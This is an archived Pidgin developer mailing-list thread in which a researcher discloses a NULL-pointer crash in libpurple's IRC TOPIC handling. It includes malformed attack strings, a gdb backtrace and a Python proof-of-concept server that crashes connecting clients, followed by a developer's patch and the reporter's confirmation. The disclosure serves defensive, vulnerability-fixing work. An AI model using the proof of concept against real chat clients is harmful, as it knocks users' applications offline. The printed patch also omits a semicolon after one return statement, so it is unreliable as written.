Jabber
 » 
Pidgin (Old Gaim)
 » 
Pidgin - Development

libpurple IRC TOPIC message Denial of Service

View: New views
3 Messages — Rating Filter:   Alert me  

libpurple IRC TOPIC message Denial of Service

by Cristofaro Mune :: Rate this Message:

Reply (Restricted by the Administrator) | Reply to Author | View Threaded | Show Only this Message

Hi,

a vulnerability present in libpurple released with the current version
of Pidgin (2.6.1).
It may allow a malicious IRC server to remotely crash libpurple and the
overlying application.

Receiving the following message from an IRC server:

:hostile TOPIC\r\n #room :topic\r\n

causes a segmentation fault because of a NULL ptr dereference, occurring
in the for loop at line 467 inside irc_mirc2txt.
This happens because both irc_msg_topic in msgs.c and irc_mirc2txt in
parse.c do not  perform checks for NULL input parameters.

Briefly, the the incoming message is processed by read_input in irc.c,
where it is changed into

:hostile TOPIC\0\n #room :topic\r\n

before being parsed by irc_parse_msg.

This function identifies irc_msg_topic as the callback function for
handling the topic message, and it attempts to build the args array with
the needed information (channel and topic description).
In doing this it creates a zero filled array (g_new0 at line 691 in
parse.c), that fails being properly populated because of the null byte
right after TOPIC.
This zero filled array is passed to irc_msg_topic, that passes it
straight away to irc_mirc2txt, without performing any check on it.

irc_mirc2txt is then called with NULL (stored in args[1]) as argument
(line 449 in msgs.c).
It will perform a g_strdup on the input (line 466 in parse.c), without
checking for NULL.
g_strdup returns NULL into the result variable and, again, this value is
not checked before being directly used in the following for loop (line
467), leading to the NULL ptr dereference and the segfault.

This behaviour has been succesfully reproduced on Pidgin (Windows XP and
Ubuntu 9.04) and finch.
The following message is also able to trigger the vulnerability:

:hostile TOPIC #room\r\n :topic\r\n

A backtrace of the crash from a debug enabled finch follows, along with
a quickly coded proof of concept, attached for testing purposes.
If needed, a slightly more detailed analysis is available on
http://www.icysilence.org

Hope this helps.

Best Regards,
Cristofaro Mune

---------------------

//Attack string:
//":hostile TOPIC\r\n #testroom :newtopic\r\n"

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb78416c0 (LWP 10897)]
irc_mirc2txt (string=0x0) at parse.c:467
467             for (i = 0, j = 0; result[i]; i++) {
(gdb) bt            ▒│
#0  irc_mirc2txt (string=0x0) at parse.c:467
#1  0xb7515515 in irc_msg_topic (irc=0x91a86a0, name=0xb75183fd "topic",
    from=0x91a9f60 "hostile", args=0x91a7640) at msgs.c:449
#2  0xb7517062 in irc_parse_msg (irc=0x91a86a0,
    input=0x91a8f90 ":hostile TOPIC") at parse.c:723
#3  0xb7511153 in read_input (irc=0x91a86a0, len=<value optimized out>)
    at irc.c:625    ▒│
#4  0x0806a483 in purple_gnt_io_invoke (source=0x914d160,
    condition=<value optimized out>, data=0x91a7620) at finch.c:169
#5  0xb7c12dad in ?? () from /usr/lib/libglib-2.0.so.0
#6  0xb7bdbb88 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#7  0xb7bdf0eb in ?? () from /usr/lib/libglib-2.0.so.0
#8  0xb7bdf5ba in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#9  0xb8022fd5 in gnt_main () at gntmain.c:516
#10 0x0806a05e in main (argc=1, argv=Cannot access memory at address 0x4
) at finch.c:439─────┘

#!/usr/bin/env python

# Proof of concept code for the
# libpurple IRC TOPIC Denial of service vulnerability
# discovered by Cristofaro Mune
#
# Published on 3/09/2009
# Verified on Pidgin (2.6.1)
# Previous versions may be also affected
#
# Usage:
# Create a new IRC account on Pidgin (or other app)
# with:
# Protocol: IRC
# Username: whatever
# Server: 127.0.0.1
# leave the remaining fields as default
#
# start this PoC with:
# python libpurple_IRC_TOPC_DOS.py
#
# On Pidgin enable the account and change the state to Available
# Pidgin will connect and crash

from socket import *
from select import select


SOCK_ADDR = '127.0.0.1'
SOCK_PORT = 6667
ANICK = "hostile"

if __name__ == "__main__":
                 

                  print 'Starting socket at %s:%d' % (SOCK_ADDR, SOCK_PORT)
                  ss = socket (AF_INET, SOCK_STREAM, 0)
                  ss.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
                  ss.bind ((SOCK_ADDR, SOCK_PORT))
                  ss.listen (1)
                 
                  print 'Waiting for connection...'

                  readfd, writefd, errorfd = select([ss], [ss], [])

                  for sk in readfd:
                  cs, host = sk.accept()

                                 #prints USER and NICK
                                 data = cs.recv(1024)
                                 print data

                                 cs.send(":%s %s\r\n %s :%s\r\n" % (ANICK, "TOPIC", "#r00m", "dis-topic"))

                  ss.close ()

_______________________________________________
Devel mailing list
Devel@...
http://pidgin.im/cgi-bin/mailman/listinfo/devel

Re: libpurple IRC TOPIC message Denial of Service

by Ethan Blanton-2 :: Rate this Message:

Reply (Restricted by the Administrator) | Reply to Author | View Threaded | Show Only this Message

Thank you for finding this.  Please verify that the attached patch
fixes the problem.

Ethan

--
The laws that forbid the carrying of arms are laws [that have no remedy
for evils].  They disarm only those who are neither inclined nor
determined to commit crimes.
                -- Cesare Beccaria, "On Crimes and Punishments", 1764

-----------------------------------------------------------------
Revision: ad2c6ee53ec9122b25aeb1f918db53be69bdeac3
Ancestor: e831c6c52971a4a144a47c3affa19788d05d58d4
Author: elb@...
Date: 2009-09-03T16:05:01
Branch: im.pidgin.pidgin

Modified files:
        ChangeLog libpurple/protocols/irc/msgs.c

ChangeLog:

Fix parsing of invalid IRC TOPIC messages which contain no actual topic
string.  Thanks to Cristofaro Mune for finding this.

============================================================
--- ChangeLog 831e2ebdd0260b68a2c19f6ee47eeec600d43d9c
+++ ChangeLog b79f978b87dd623bd1fee6f93b4279055e57ff12
@@ -6,6 +6,9 @@ version 2.6.2 (??/??/2009):
   to just making the warning non-fatal.
  * Fix using GNOME proxy settings properly.  (Erik van Pienbroek)
 
+ IRC:
+ * Fix parsing of invalid TOPIC messages.
+
  MSN:
  * Sending custom smileys in chats is now supported.
  * Ink messages are now saved when using the HTML logger.
============================================================
--- libpurple/protocols/irc/msgs.c 6d17f00388dffe02b6d0699998e5921293fb25cc
+++ libpurple/protocols/irc/msgs.c 7bd2efb6b570875cb82b9745fc3a12dd89a5ddbd
@@ -445,9 +445,13 @@ void irc_msg_topic(struct irc_conn *irc,
  PurpleConversation *convo;
 
  if (!strcmp(name, "topic")) {
+ if (!args[0] || !args[1])
+ return;
  chan = args[0];
  topic = irc_mirc2txt (args[1]);
  } else {
+ if (!args[0] || !args[1] || !args[2])
+ return
  chan = args[1];
  topic = irc_mirc2txt (args[2]);
  }


_______________________________________________
Devel mailing list
Devel@...
http://pidgin.im/cgi-bin/mailman/listinfo/devel

signature.asc (492 bytes) Download Attachment

Re: libpurple IRC TOPIC message Denial of Service

by Cristofaro Mune :: Rate this Message:

Reply (Restricted by the Administrator) | Reply to Author | View Threaded | Show Only this Message

Thanks Ethan,

I have tested your patch and it fixes the issue.

Best Regards,
Cristofaro

Ethan Blanton wrote:
> Thank you for finding this.  Please verify that the attached patch
> fixes the problem.
>
> Ethan
>
>  

_______________________________________________
Devel mailing list
Devel@...
http://pidgin.im/cgi-bin/mailman/listinfo/devel
Free embeddable forum powered by Nabble Forum Help